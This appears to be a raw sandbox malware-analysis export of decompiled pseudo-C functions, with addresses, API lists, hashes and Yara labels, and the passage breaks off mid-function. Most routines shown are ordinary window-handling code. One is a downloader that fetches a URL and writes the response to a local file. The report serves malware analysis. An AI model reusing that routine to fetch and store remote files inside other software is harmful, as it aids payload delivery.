                                                    0x0044ead0
                                                    0x0044ead1
                                                    0x00000000
                                                    0x0044ead3
                                                    0x00000000
                                                    0x0044ead3
                                                    0x00000000
                                                    0x0044ead1
                                                    0x0044eab4
                                                    0x00000000
                                                    0x0044ea6c
                                                    0x0044ea6c
                                                    0x0044ea6f
                                                    0x0044ecb2
                                                    0x0044ecbb
                                                    0x0044ecbc
                                                    0x0044ecbe
                                                    0x00000000
                                                    0x0044ecc4
                                                    0x0044ecc4
                                                    0x0044ecc5
                                                    0x0044ecc5
                                                    0x0044ecc7
                                                    0x0044ecde
                                                    0x0044ece1
                                                    0x0044ece5
                                                    0x00000000
                                                    0x00000000
                                                    0x0044edad
                                                    0x0044edae
                                                    0x0044edae
                                                    0x0044edaf
                                                    0x00000000
                                                    0x0044edb5
                                                    0x00000000
                                                    0x0044edb5
                                                    0x00000000
                                                    0x0044edaf
                                                    0x0044ecf7
                                                    0x0044ecfc
                                                    0x0044ecfd
                                                    0x0044ed02
                                                    0x0044ed05
                                                    0x0044ed14
                                                    0x0044ed19
                                                    0x0044ed1a
                                                    0x0044ed1f
                                                    0x0044ed22
                                                    0x0044ed2e
                                                    0x0044ed43
                                                    0x0044ed5c
                                                    0x0044ed63
                                                    0x0044ed66
                                                    0x0044ed69
                                                    0x0044ed6e
                                                    0x0044ed73
                                                    0x0044ed88
                                                    0x0044ed88
                                                    0x0044ea75
                                                    0x0044ea75
                                                    0x0044ea76
                                                    0x0044edbd
                                                    0x0044edc6
                                                    0x0044edc7
                                                    0x0044edc9
                                                    0x00000000
                                                    0x0044edcf
                                                    0x0044edcf
                                                    0x0044edd0
                                                    0x0044edd0
                                                    0x0044edd2
                                                    0x0044ede9
                                                    0x0044edec
                                                    0x0044edf0
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eef0
                                                    0x0044eef1
                                                    0x0044eef1
                                                    0x0044eef2
                                                    0x00000000
                                                    0x0044eef8
                                                    0x00000000
                                                    0x0044eef8
                                                    0x00000000
                                                    0x0044eef2
                                                    0x0044ee02
                                                    0x0044ee10
                                                    0x0044ee1f
                                                    0x0044ee2d
                                                    0x0044ee39
                                                    0x0044ee47
                                                    0x0044ee50
                                                    0x0044ee65
                                                    0x0044ee7f
                                                    0x0044ee84
                                                    0x0044ee87
                                                    0x0044ee8a
                                                    0x0044ee8f
                                                    0x0044ee94
                                                    0x0044eea6
                                                    0x0044eea6
                                                    0x0044ea7c
                                                    0x0044ea7f
                                                    0x0044ebb0
                                                    0x0044ebb9
                                                    0x0044ebba
                                                    0x0044ebbc
                                                    0x00000000
                                                    0x0044ebc2
                                                    0x0044ebc2
                                                    0x0044ebc3
                                                    0x0044ebc3
                                                    0x0044ebc5
                                                    0x0044ebd1
                                                    0x0044ebd4
                                                    0x0044ebd7
                                                    0x0044ebda
                                                    0x0044ec05
                                                    0x0044ebdc
                                                    0x0044ebe9
                                                    0x0044ebe9
                                                    0x0044ec08
                                                    0x0044ec0c
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eca2
                                                    0x0044eca3
                                                    0x0044eca3
                                                    0x0044eca4
                                                    0x00000000
                                                    0x0044ecaa
                                                    0x00000000
                                                    0x0044ecaa
                                                    0x00000000
                                                    0x0044eca4
                                                    0x0044ec24
                                                    0x0044ec29
                                                    0x0044ec2b
                                                    0x0044ec32
                                                    0x0044ec3d
                                                    0x0044ec3f
                                                    0x0044ec3f
                                                    0x0044ec44
                                                    0x0044ec4c
                                                    0x0044ec4f
                                                    0x0044ec51
                                                    0x0044ec57
                                                    0x0044ec59
                                                    0x0044ec60
                                                    0x0044ec60
                                                    0x0044ec66
                                                    0x0044ec6c
                                                    0x0044ec73
                                                    0x0044ec8f
                                                    0x0044ec98
                                                    0x0044ec75
                                                    0x0044ec85
                                                    0x0044ec85
                                                    0x0044ec73
                                                    0x0044ec51
                                                    0x0044ea85
                                                    0x0044ef43
                                                    0x0044ef46
                                                    0x0044ef4a
                                                    0x0044ef4d
                                                    0x0044ef51
                                                    0x0044ef54
                                                    0x0044ef55
                                                    0x0044ef5a
                                                    0x0044ef5a
                                                    0x0044ef5d
                                                    0x0044ef5f
                                                    0x0044ef62
                                                    0x0044ef65
                                                    0x0044ef72
                                                    0x0044ef72
                                                    0x0044ea76
                                                    0x0044ea6f
                                                    0x0044ea6a
                                                    0x00000000

                                                    APIs
                                                    • SaveDC.GDI32(?), ref: 0044ED0F
                                                    • RestoreDC.GDI32(?,?), ref: 0044ED83
                                                    • GetWindowDC.USER32(?,00000000,0044EF73), ref: 0044EDFD
                                                    • SaveDC.GDI32(?), ref: 0044EE34
                                                    • RestoreDC.GDI32(?,?), ref: 0044EEA1
                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044EF73), ref: 0044EF55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: RestoreSaveWindow$NtdllProc_
                                                    • String ID: LbC
                                                    • API String ID: 1346906915-1054848185
                                                    • Opcode ID: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                    • Instruction ID: 9827756e5d0f78ec9e29d95b15367e488dbc04d0ac3e4e0047c09454960c1bc5
                                                    • Opcode Fuzzy Hash: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                    • Instruction Fuzzy Hash: 5AE19D34A04605DFEB10DF6AC8819AEF3F5FF58304B2485AAE805A7361D738ED41CB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045A104 Relevance: 9.1, APIs: 6, Instructions: 86windownativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E0045A104(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E0045906C( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E00441704( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L00407540();
						}
					}
					_t26 =  *0x49d970; // 0x49e900
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x49d970; // 0x49e900
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E00454D78(_t36, 0);
						E00457194( *((intOrPtr*)(_t51 + 0x44)));
					}
					E0045974C(_t51);
					_t21 =  *0x49ebbc; // 0x0
					_t55 =  *((intOrPtr*)(_t21 + 0x64));
					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
						_t21 = SetFocus(E00441704(_t55));
					}
					if( *((short*)(_t51 + 0x122)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x120))();
					}
				}
				return _t21;
			}











                                                    0x0045a106
                                                    0x0045a10c
                                                    0x0045a113
                                                    0x0045a11d
                                                    0x0045a126
                                                    0x0045a160
                                                    0x0045a168
                                                    0x0045a137
                                                    0x0045a145
                                                    0x0045a147
                                                    0x00000000
                                                    0x0045a149
                                                    0x0045a149
                                                    0x0045a14b
                                                    0x0045a150
                                                    0x0045a158
                                                    0x0045a159
                                                    0x0045a159
                                                    0x0045a147
                                                    0x0045a175
                                                    0x0045a17e
                                                    0x0045a180
                                                    0x0045a182
                                                    0x0045a182
                                                    0x0045a188
                                                    0x0045a191
                                                    0x0045a193
                                                    0x0045a195
                                                    0x0045a195
                                                    0x0045a19f
                                                    0x0045a1a4
                                                    0x0045a1a9
                                                    0x0045a1bc
                                                    0x0045a1c4
                                                    0x0045a1c4
                                                    0x0045a1cb
                                                    0x0045a1d0
                                                    0x0045a1d5
                                                    0x0045a1da
                                                    0x0045a1e4
                                                    0x0045a1e4
                                                    0x0045a1f1
                                                    0x00000000
                                                    0x0045a1fb
                                                    0x0045a1f1
                                                    0x0045a203

                                                    APIs
                                                    • IsIconic.USER32 ref: 0045A10C
                                                    • SetActiveWindow.USER32(?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A11D
                                                    • IsWindowEnabled.USER32(00000000), ref: 0045A140
                                                    • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A159
                                                    • SetWindowPos.USER32(?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A19F
                                                    • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A1E4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                    • String ID:
                                                    • API String ID: 3996302123-0
                                                    • Opcode ID: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                    • Instruction ID: e53a9b633d1b0bd006f11759a665d113d80ac3550e73a578dd09315b07be2b8d
                                                    • Opcode Fuzzy Hash: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                    • Instruction Fuzzy Hash: B831DD71B006009BEB11EB69CD86B563798AB04709F0805AAFE04DF2D7D67DEC58C75A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004410F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E004410F0(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(L00441A08(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = L00441A08(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E0043A91C(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E0043A5D0(_t52);
						return L00403DE8(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}












                                                    0x004410f9
                                                    0x004410fb
                                                    0x004410fd
                                                    0x00441102
                                                    0x0044111d
                                                    0x00441126
                                                    0x00441154
                                                    0x00441154
                                                    0x00441157
                                                    0x0044115d
                                                    0x00441163
                                                    0x00441168
                                                    0x0044116d
                                                    0x0044116f
                                                    0x00441171
                                                    0x00441183
                                                    0x0044118d
                                                    0x00441198
                                                    0x00441199
                                                    0x0044119a
                                                    0x0044119b
                                                    0x004411a7
                                                    0x004411a7
                                                    0x004411ac
                                                    0x004411ae
                                                    0x00000000
                                                    0x004411b9
                                                    0x0044112f
                                                    0x00441134
                                                    0x00441136
                                                    0x00000000
                                                    0x00000000
                                                    0x0044114d
                                                    0x00000000
                                                    0x00441111
                                                    0x00441111
                                                    0x00441117
                                                    0x004411c4
                                                    0x004411c4
                                                    0x00000000
                                                    0x00441117

                                                    APIs
                                                    • IsIconic.USER32 ref: 0044112F
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0044114D
                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 00441183
                                                    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 004411A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$Placement$Iconic
                                                    • String ID: ,
                                                    • API String ID: 568898626-3772416878
                                                    • Opcode ID: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                    • Instruction ID: 973ca0ced29493b3e0d87defc8b2cb9363f4da81e4e6ee6b5ea2909c58c8dcf6
                                                    • Opcode Fuzzy Hash: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                    • Instruction Fuzzy Hash: AA21B271A00108ABDF10EF69C8C19DA77A8AF4D354F00406AFE14EF352D779ED448B65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045A054 Relevance: 7.6, APIs: 5, Instructions: 59nativewindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E0045A054(void* __eax) {
				int _t21;
				struct HWND__* _t36;
				void* _t40;

				_t40 = __eax;
				_t1 = _t40 + 0x30; // 0x0
				_t21 = IsIconic( *_t1);
				if(_t21 == 0) {
					E0045973C();
					_t2 = _t40 + 0x30; // 0x0
					SetActiveWindow( *_t2);
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E00441704( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t15 = _t40 + 0x30; // 0x0
						_t21 = E0045906C( *_t15, 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						_t36 = E00441704( *((intOrPtr*)(_t40 + 0x44)));
						_t13 = _t40 + 0x30; // 0x0
						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t14 = _t40 + 0x30; // 0x0
						_t21 =  *_t14;
						_push(_t21);
						L00407540();
					}
					if( *((short*)(_t40 + 0x11a)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x118))();
					}
				}
				return _t21;
			}






                                                    0x0045a056
                                                    0x0045a058
                                                    0x0045a05c
                                                    0x0045a063
                                                    0x0045a06b
                                                    0x0045a070
                                                    0x0045a074
                                                    0x0045a07d
                                                    0x0045a0e1
                                                    0x0045a0e4
                                                    0x0045a0a0
                                                    0x0045a0a4
                                                    0x0045a0b6
                                                    0x0045a0bc
                                                    0x0045a0c0
                                                    0x0045a0c5
                                                    0x0045a0c7
                                                    0x0045a0cc
                                                    0x0045a0d1
                                                    0x0045a0d1
                                                    0x0045a0d4
                                                    0x0045a0d5
                                                    0x0045a0d5
                                                    0x0045a0f1
                                                    0x00000000
                                                    0x0045a0fb
                                                    0x0045a0f1
                                                    0x0045a103

                                                    APIs
                                                    • IsIconic.USER32 ref: 0045A05C
                                                    • SetActiveWindow.USER32(00000000,00000000,?,?,0045A790), ref: 0045A074
                                                    • IsWindowEnabled.USER32(00000000), ref: 0045A097
                                                    • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0045A790), ref: 0045A0C0
                                                    • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 0045A0D5
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                    • String ID:
                                                    • API String ID: 1720852555-0
                                                    • Opcode ID: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                    • Instruction ID: fcf5efa9db48042d746d78bebf6e1cf2cc32c712e84d9ef6b3749e70c2da43cc
                                                    • Opcode Fuzzy Hash: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                    • Instruction Fuzzy Hash: EF110071650200EBDB54EE69C9C6B9637E8AF04715F0800AABF04DF2D7D679EC448759
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C6FC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E0042C6FC(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x49e929 != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E0042C66C( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x49e904; // 0x42c6fc
				 *0x49e904 = E0042C4FC(1, _t19, _t21, __edi, _t23);
				return  *0x49e904(_t23, _t19);
			}










                                                    0x0042c704
                                                    0x0042c707
                                                    0x0042c711
                                                    0x0042c73b
                                                    0x0042c74c
                                                    0x0042c75f
                                                    0x0042c74e
                                                    0x0042c753
                                                    0x0042c753
                                                    0x00000000
                                                    0x0042c769
                                                    0x00000000
                                                    0x0042c73d
                                                    0x0042c718
                                                    0x0042c725
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID: MonitorFromWindow
                                                    • API String ID: 190572456-2842599566
                                                    • Opcode ID: 8d1f9452d8f12363e96bde9292e11cbfcc82fa1fc2827bfdbdac76f16a64d1e2
                                                    • Instruction ID: a470fbf3681d2cee79b4262df8cd97740cfa3d316a724833ce9ade3e4696291a
                                                    • Opcode Fuzzy Hash: 8d1f9452d8f12363e96bde9292e11cbfcc82fa1fc2827bfdbdac76f16a64d1e2
                                                    • Instruction Fuzzy Hash: 1201ADB1A051296A8B00EB65ADC19BF735C9B84354B900037F810A3241D72CBE019BAE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00474D50 Relevance: 6.1, APIs: 4, Instructions: 90networkfileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 61%
                                                    			E00474D50(void* __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _v8;
				char _v9;
				void* _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				void _v1060;
				char _v1392;
				char _v1856;
				DWORD* _t57;
				intOrPtr _t68;
				void* _t70;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xfffff8c4;
				_v1856 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v8 = __edx;
				_t70 = __eax;
				_t57 =  &_v24;
				_push(_t72);
				_push(0x474f77);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				E00402B68(0,  &_v1856);
				L00409E18(_v1856,  &_v28);
				_v16 = InternetOpenA(E00404E80(_v28), 0, 0, 0, 0);
				_push(_t72);
				_push(0x474e92);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v20 = InternetOpenUrlA(_v16, E00404E80(_t70), 0, 0, 0x84000000, 0);
				_push(_t72);
				_push(0x474e74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				E00402F1C( &_v1392, _v8, 0);
				E004028C4(E004035E4());
				do {
					InternetReadFile(_v20,  &_v1060, 0x400, _t57);
					E004028C4(E0040306C(0));
				} while ( *_t57 != 0);
				E004028C4(E0040308C( &_v1392));
				_v9 = 1;
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(0x474e7b);
				return InternetCloseHandle(_v20);
			}




















                                                    0x00474d51
                                                    0x00474d53
                                                    0x00474d5d
                                                    0x00474d63
                                                    0x00474d66
                                                    0x00474d69
                                                    0x00474d6c
                                                    0x00474d6f
                                                    0x00474d71
                                                    0x00474d76
                                                    0x00474d77
                                                    0x00474d7c
                                                    0x00474d7f
                                                    0x00474d8a
                                                    0x00474d98
                                                    0x00474db3
                                                    0x00474db8
                                                    0x00474db9
                                                    0x00474dbe
                                                    0x00474dc1
                                                    0x00474de0
                                                    0x00474de5
                                                    0x00474de6
                                                    0x00474deb
                                                    0x00474dee
                                                    0x00474dfa
                                                    0x00474e0f
                                                    0x00474e14
                                                    0x00474e25
                                                    0x00474e3f
                                                    0x00474e44
                                                    0x00474e54
                                                    0x00474e59
                                                    0x00474e5f
                                                    0x00474e62
                                                    0x00474e65
                                                    0x00474e73

                                                    APIs
                                                      • Part of subcall function 00402B68: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,?,00000000,00474795,004747D4,?,00000000,004747BE,?,?,?,?,00000000), ref: 00402B8C
                                                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
                                                    • InternetCloseHandle.WININET(?), ref: 00474E6E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$FileOpen$CloseHandleModuleNameRead
                                                    • String ID:
                                                    • API String ID: 1785656124-0
                                                    • Opcode ID: 258ed6f4a337dd00b29ed6c0571024dd33be25b5071fc36f155e22a10198ec8f
                                                    • Instruction ID: 9dd8df19d1045a063bc6dcad90270211b168fb7c8f28217f7d4554014ce166d6
                                                    • Opcode Fuzzy Hash: 258ed6f4a337dd00b29ed6c0571024dd33be25b5071fc36f155e22a10198ec8f
                                                    • Instruction Fuzzy Hash: 8D318670A00218ABDB11DFA5DC52BAEB7B8EB48704F91447AF504B72C1D7786A00CF68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045E9EC Relevance: 4.9, APIs: 3, Instructions: 353nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E0045E9EC(void* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
				signed int _v8;
				char _v9;
				char _v16;
				char _v20;
				char _v276;
				char _v280;
				intOrPtr _t154;
				signed int _t160;
				int _t163;
				int _t168;
				signed int _t172;
				int _t173;
				int _t183;
				int _t188;
				int _t198;
				int _t202;
				int _t206;
				void* _t217;
				void* _t221;
				void* _t225;
				void* _t257;
				intOrPtr _t278;
				intOrPtr _t306;
				struct _ITEMIDLIST** _t307;
				intOrPtr* _t309;
				void* _t312;
				void* _t318;
				void* _t319;
				void* _t320;

				_v280 = 0;
				_v16 = 0;
				_v20 = 0;
				_t309 = __edx;
				_t257 = __eax;
				_push(_t312);
				_push(0x45ef62);
				_push( *[fs:eax]);
				 *[fs:eax] = _t312 + 0xfffffee0;
				_t306 =  *__edx;
				if(_t306 !=  *((intOrPtr*)(__eax + 0xd2))) {
					_push( *(__edx + 8));
					_push( *(__edx + 4));
					_push(_t306);
					_t154 =  *((intOrPtr*)(__eax + 0xda));
					_push(_t154);
					L00407540();
					 *((intOrPtr*)(__edx + 0xc)) = _t154;
					goto L80;
				} else {
					_t160 =  *(__edx + 8);
					_v8 = _t160 & 0x7fffffff;
					_v9 = (_t160 & 0x80000000) != 0;
					_t307 =  *(__edx + 4);
					if( *_t307 != 0) {
						__eflags = _v8 - 0x40000;
						if(_v8 != 0x40000) {
							_t163 = SHGetPathFromIDList( *_t307,  &_v276);
							__eflags = _t163;
							if(_t163 != 0) {
								E0040A174( &_v276,  &_v16);
							} else {
								E004049C0( &_v16);
							}
						} else {
							asm("fild dword [eax]");
							asm("fldln2");
							asm("fxch st0, st1");
							asm("fyl2x");
							[tword [ebp-0x120] = __fp0;
							asm("wait");
							asm("fldln2");
							asm("fxch st0, st1");
							asm("fyl2x");
							asm("fdivrp st1, st0");
							E00402C20();
							asm("adc edx, 0x0");
							E00404BA8();
							E00404CCC( &_v16, 0x45ef84, _v280);
						}
					} else {
						E004049C0( &_v16);
					}
					if(_t307[1] != 0) {
						_t168 = SHGetPathFromIDList(_t307[1],  &_v276);
						__eflags = _t168;
						if(_t168 != 0) {
							E0040A174( &_v276,  &_v20);
						} else {
							E004049C0( &_v20);
						}
					} else {
						E004049C0( &_v20);
					}
					_t318 =  *(_t257 + 0xde) - _v8;
					if(_t318 != 0) {
						L16:
						_t172 = _v8;
						_t319 = _t172 - 0x400;
						if(_t319 > 0) {
							__eflags = _t172 - 0x8000;
							if(__eflags > 0) {
								_t173 = _t172 - 0x10000;
								__eflags = _t173;
								if(_t173 == 0) {
									__eflags =  *((short*)(_t257 + 0x5c));
									if( *((short*)(_t257 + 0x5c)) != 0) {
										 *((intOrPtr*)(_t257 + 0x5a))(_v9);
									}
								} else {
									_t183 = _t173 - 0x10000;
									__eflags = _t183;
									if(_t183 == 0) {
										__eflags =  *((short*)(_t257 + 0x9c));
										if( *((short*)(_t257 + 0x9c)) != 0) {
											 *((intOrPtr*)(_t257 + 0x9a))(_v9, _v20);
										}
									} else {
										_t188 = _t183 - 0x20000;
										__eflags = _t188;
										if(_t188 == 0) {
											__eflags =  *((short*)(_t257 + 0x6c));
											if( *((short*)(_t257 + 0x6c)) != 0) {
												 *((intOrPtr*)(_t257 + 0x6a))(_v9);
											}
										} else {
											__eflags = _t188 == 0x7fc0000;
											if(_t188 == 0x7fc0000) {
												__eflags =  *((short*)(_t257 + 0x34));
												if( *((short*)(_t257 + 0x34)) != 0) {
													 *((intOrPtr*)(_t257 + 0x32))();
												}
											}
										}
									}
								}
							} else {
								if(__eflags == 0) {
									__eflags =  *((short*)(_t257 + 0xc4));
									if( *((short*)(_t257 + 0xc4)) != 0) {
										 *((intOrPtr*)(_t257 + 0xc2))(_v9);
									}
								} else {
									_t198 = _t172 - 0x800;
									__eflags = _t198;
									if(_t198 == 0) {
										__eflags =  *((short*)(_t257 + 0x3c));
										if( *((short*)(_t257 + 0x3c)) != 0) {
											 *((intOrPtr*)(_t257 + 0x3a))(_v9);
										}
									} else {
										_t202 = _t198 - 0x800;
										__eflags = _t202;
										if(_t202 == 0) {
											__eflags =  *((short*)(_t257 + 0xbc));
											if( *((short*)(_t257 + 0xbc)) != 0) {
												 *((intOrPtr*)(_t257 + 0xba))(_v9);
											}
										} else {
											_t206 = _t202 - 0x1000;
											__eflags = _t206;
											if(_t206 == 0) {
												__eflags =  *((short*)(_t257 + 0xcc));
												if( *((short*)(_t257 + 0xcc)) != 0) {
													 *((intOrPtr*)(_t257 + 0xca))(_v9);
												}
											} else {
												__eflags = _t206 == 0x2000;
												if(_t206 == 0x2000) {
													__eflags =  *((short*)(_t257 + 0xb4));
													if( *((short*)(_t257 + 0xb4)) != 0) {
														 *((intOrPtr*)(_t257 + 0xb2))(_v9);
													}
												}
											}
										}
									}
								}
							}
							goto L78;
						}
						if(_t319 == 0) {
							__eflags =  *((short*)(_t257 + 0x94));
							if( *((short*)(_t257 + 0x94)) != 0) {
								 *((intOrPtr*)(_t257 + 0x92))(_v9);
							}
							goto L78;
						}
						_t320 = _t172 - 0x20;
						if(_t320 > 0) {
							_t217 = _t172 - 0x40;
							if(_t217 == 0) {
								__eflags =  *((short*)(_t257 + 0x7c));
								if( *((short*)(_t257 + 0x7c)) != 0) {
